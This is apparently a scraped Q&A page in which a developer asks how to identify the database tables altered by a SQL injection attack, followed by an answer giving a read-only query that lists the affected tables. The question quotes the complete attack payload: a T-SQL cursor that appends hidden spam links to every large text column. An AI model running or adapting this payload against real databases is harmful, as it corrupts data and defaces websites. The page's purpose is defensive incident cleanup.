sql server - Find the tables affected by SQL injection -


recently, discovered 1 of our aspx handlers targeted sql injection attack. made possible fact took substring of url starting @ index x until end of url string , matched records in database made easy attackers.

here example of injection performed:

;declare @c cursor; declare @d varchar(4000); set @c=cursor  select  'update ['+table_name+']  set ['+column_name+']=['+column_name+']+case abs(checksum(newid()))%7  when 0 ''''+char(60)+''div style="display:none"''+char(62) +''are abortions safe '' +char(60)+''a href="http:''+char(47)+char(47) +''www.ooblong.com''+char(47)+''blog''+char(47) +''template''+char(47)+''page''+char(47)+''abortion-clinics-nyc.aspx"'' +char(62)+case abs(checksum(newid()))%3  when 0 ''reasons against abortion''  when 1 ''pregnant abortion''  else ''pill pregnancy termination'' end  +char(60)+char(47)+''a''+char(62)+'' how abortion cost'' +char(60)+char(47)+''div''+char(62)+'''' else '''' end'  sysindexes  inner join sysobjects o  on i.id=o.id  inner join information_schema.columns  on o.name=table_name  where(indid=0 or indid=1)  , data_type '%varchar'  and(character_maximum_length=-1 or character_maximum_length=2147483647); open @c; fetch next @c @d; while @@fetch_status=0  begin exec (@d); fetch next @c @d; end; close @c--

we have secured our aspx handlers refuse these kinds of requests. find out tables affected attack. discovered @ least 2 tables affected, afraid there more. how can reverse engineer above sql find out tables affected?

just take query you've shown , strip off unnecessary details attack itself, , get:

select table_name, column_name sysindexes  inner join sysobjects o  on i.id=o.id  inner join information_schema.columns  on o.name=table_name  where(indid=0 or indid=1)  , data_type '%varchar'  and(character_maximum_length=-1 or character_maximum_length=2147483647);

tables , columns in output of query used in cursor , affected attack you've mentioned.


-

Comments

Post a Comment

Popular posts from this blog

c# - Binding a comma separated list to a List<int> in asp.net web api -

the default binder in web api expecst http://url.com/webapi/report/?pageids=3243&pageids=2365 to bind public ihttpactionresult report(list<int> pageids){ // exciting webapi code} i wish bind http://url.com/webapi/report/?pageids=3243,2365 as running out of space in url get . i have created class public class commaseparatedmodelbinder : system.web.http.modelbinding.imodelbinder { public bool bindmodel(httpactioncontext actioncontext, modelbindingcontext bindingcontext) { //binding in here } } and registered in webapiconfig.cs var provider = new simplemodelbinderprovider( typeof(list<int>), new commaseparatedmodelbinder()); config.services.insert(typeof(modelbinderprovider), 0, provider); i have altered method signature use model binder so public ihttpactionresult report( [modelbinder] list<int> pageids){ // exciting webapi code} however break point in binder not being ...
Read more

how to prompt save As Box in Excel Interlop c# MVC 4 -

i want export excel sheet using excel interloop... i have datatable convert excel sheet... now there way save file using save dialogue box in mvc 4 here code public string datatabletoexcel(datatable dt, string htmlheading, string key) { try { microsoft.office.interop.excel.application excel; microsoft.office.interop.excel.workbook excelworkbook; microsoft.office.interop.excel.worksheet excelsheet; microsoft.office.interop.excel.range excelcellrange; excel = new microsoft.office.interop.excel.application(); excel.visible = false; excel.displayalerts = false; excelworkbook = excel.workbooks.add(type.missing); excelsheet = (microsoft.office.interop.excel.worksheet)excelworkbook.activesheet; excelsheet.name = "sheet1"; dataset ...
Read more

xslt 1.0 - How to access or retrieve mets content of an item from another item? -

my use case have item has link in item. example, item 123456789/152 has metadata field dc.relation.hasversion=123456789/717 . within item view of 123456789/152 , how can retrieve values of metadata of 123456789/717 ? example, want retrieve dc.language.iso value of 123456789/717 123456789/152 . i looked @ related items feature in dspace don't know how metadata displayed in related items list pulled items in list. i using dspace version 5.3 mirage 2 theme . edit based on schweerelos answer, below actual code. using custom metadata field dc.relation.languageversion . basically, want link other version instead of displaying value, display dc.language.iso of other version in item-view.xsl . i've incorporated answer of schweerelos question in code just displaying value of dc.relation.languageversion . sample values of dc.relation.languageversion 10665.1/9843 ; 10665.1/9844 ie not complete uri handle. thanks in advance! actual code <xsl:template name=...
Read more